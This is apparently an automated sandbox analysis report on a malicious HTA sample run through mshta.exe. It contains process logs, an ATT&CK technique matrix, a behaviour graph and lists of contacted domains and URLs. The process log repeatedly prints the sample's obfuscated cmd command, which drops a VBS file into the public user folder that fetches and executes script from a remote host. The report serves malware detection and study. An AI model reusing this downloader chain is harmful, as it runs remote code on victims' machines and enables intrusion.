Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts1
Windows Management Instrumentation
111
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Modify Registry
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Disable or Modify Tools
NTDS22
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Obfuscated Files or Information
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579831 Sample: Archivo-PxFkiLTWYG-23122024... Startdate: 23/12/2024 Architecture: WINDOWS Score: 76 40 102.57.205.92.host.secureserver.net 2->40 42 www.msn.com 2->42 44 11 other IPs or domains 2->44 54 Sigma detected: Suspicious MSHTA Child Process 2->54 56 Sigma detected: WScript or CScript Dropper 2->56 58 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->58 60 2 other signatures 2->60 11 mshta.exe 79 2->11         started        signatures3 process4 dnsIp5 46 securepubads.g.doubleclick.net 172.217.19.194, 443, 49794, 49847 GOOGLEUS United States 11->46 48 s3-r-w.sa-east-1.amazonaws.com 3.5.232.130, 443, 49838 AMAZON-02US United States 11->48 50 s3-sa-east-1.amazonaws.com 16.12.2.36, 443, 49837 unknown United States 11->50 64 Obfuscated command line found 11->64 15 cmd.exe 1 11->15         started        signatures6 process7 signatures8 66 Obfuscated command line found 15->66 18 cmd.exe 2 15->18         started        22 conhost.exe 15->22         started        24 cmd.exe 1 15->24         started        process9 file10 36 C:\Users\Public\cNOV.vbs, ASCII 18->36 dropped 62 Command shell drops VBS files 18->62 26 cmd.exe 1 18->26         started        28 cmd.exe 1 18->28         started        signatures11 process12 process13 30 cmd.exe 3 2 26->30         started        process14 32 wscript.exe 14 30->32         started        dnsIp15 38 102.57.205.92.host.secureserver.net 92.205.57.102, 443, 49840, 49843 GD-EMEA-DC-SXB1DE Germany 32->38 52 System process connects to network (likely due to code injection or exploit) 32->52 signatures16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
172.217.19.194
truefalse
    high
    chrome.cloudflare-dns.com
    172.64.41.3
    truefalse
      high
      102.57.205.92.host.secureserver.net
      92.205.57.102
      truetrue
        unknown
        s3-sa-east-1.amazonaws.com
        16.12.2.36
        truefalse
          high
          s3-r-w.sa-east-1.amazonaws.com
          3.5.232.130
          truefalse
            high
            ax-0001.ax-msedge.net
            150.171.28.10
            truefalse
              high
              srtb.msn.com
              unknown
              unknownfalse
                high
                www.americanas.com.br
                unknown
                unknownfalse
                  high
                  statics-americanas.b2w.io
                  unknown
                  unknownfalse
                    unknown
                    tse1.mm.bing.net
                    unknown
                    unknownfalse
                      high
                      logs-referer.s3-sa-east-1.amazonaws.com
                      unknown
                      unknownfalse
                        unknown
                        images-americanas.b2w.io
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://102.57.205.92.host.secureserver.net//g1true
                            unknown
                            https://102.57.205.92.host.secureserver.net/g1/true
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodommshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png3Zmshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entregamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                    high
                                    https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559545171.000000000AB86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559064274.000000000AB7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551257362.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                      high
                                      https://www.americanas.com.br/hotsite/atendimentomshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                        high
                                        https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510880698.000000000720C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.americanas.com.br/busca/ar-condicionado-portatilmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.00000000071F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573298342.00000000071FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510880698.00000000071FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.00000000071F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosi(mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12569631340.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelariamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578035949.000000000AB87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 